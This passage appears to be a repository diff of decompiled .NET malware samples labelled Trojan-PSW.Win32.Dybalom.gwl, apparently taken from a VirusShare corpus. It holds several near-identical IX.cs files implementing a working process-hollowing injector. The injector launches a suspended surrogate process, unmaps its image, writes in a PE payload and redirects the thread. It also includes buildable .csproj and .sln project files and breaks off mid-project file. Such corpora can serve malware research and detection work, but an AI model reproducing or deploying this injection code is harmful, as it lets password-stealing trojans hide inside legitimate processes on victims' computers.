[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>lmyuayzw</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "lmyuayzw", "Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606.csproj", "{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}.Debug|Any CPU.Build.0 = Debug|Any CPU
{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}.Release|Any CPU.ActiveCfg = Release|Any CPU
{2D830FDA-57D4-43FA-93AB-94E19D8CEDA3}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: rern5947, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8B36B2BF-40BC-44F3-B93C-15B2B8352B1E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>rern5947</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "rern5947", "Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030.csproj", "{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}.Debug|Any CPU.Build.0 = Debug|Any CPU
{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}.Release|Any CPU.ActiveCfg = Release|Any CPU
{40F3F448-351E-4ED3-BAE8-C8C0BA5433B6}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: 3porhvzz, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2697C77-1B71-47DF-A403-2C1EF862C8A2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{95BBF3DA-5600-478B-B7E9-A65E32249CD4}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>3porhvzz</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "3porhvzz", "Trojan-PSW.Win32.Dybalom.gwl-a6d468a46bde17aa2235ad595a704c8cb4fc5349879fba5ac6c202d8982879ab.csproj", "{95BBF3DA-5600-478B-B7E9-A65E32249CD4}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{95BBF3DA-5600-478B-B7E9-A65E32249CD4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{95BBF3DA-5600-478B-B7E9-A65E32249CD4}.Debug|Any CPU.Build.0 = Debug|Any CPU
{95BBF3DA-5600-478B-B7E9-A65E32249CD4}.Release|Any CPU.ActiveCfg = Release|Any CPU
{95BBF3DA-5600-478B-B7E9-A65E32249CD4}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: 4tkhjivf, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 655E4C02-E074-4FB9-AD93-32224C96B5B7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-e39c1d1a86fe15bd92391ef49b432ac3f28478848effc93e3328ae392db7eb37.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{181646B5-7CD1-4783-B41A-63E8BB743BAA}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>4tkhjivf</AssemblyName>
